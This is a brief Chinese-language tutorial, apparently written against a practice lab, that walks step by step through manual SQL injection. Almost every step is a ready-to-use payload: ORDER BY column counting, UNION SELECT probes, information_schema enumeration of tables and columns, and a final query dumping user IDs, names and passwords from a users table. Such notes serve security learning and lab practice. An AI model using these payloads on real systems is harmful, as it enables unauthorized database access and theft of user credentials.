手注步骤
目录
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据
1.判断是否存在注入,注入是字符型还是数字型
判断注入类型:数字型,字符型
2.猜解SQL查询语句中的字段数
判断字段数:
1′ or 1=1 order by 1,2,3,4,5 #
数字累加,直到不出结果或者报错。
注释常常使用--+或者#或者%23
或者用:
-1′ union select 1,2 #
两个sql语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来
顺路进行下一步
3.确定显示的字段顺序
-1′ union select 1,2 #
4.获取当前数据库
-1′ union select 1,database() #
5.获取数据库中的表
-1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
从information_schema中查找表名
进行联合查询时要将查询用的语句放在最后一项
6.获取表中的字段名
-1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
爆users表内的表名
7.下载数据
-1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
从users里面取出所有用户的user_id,first_name,last_name,password的数据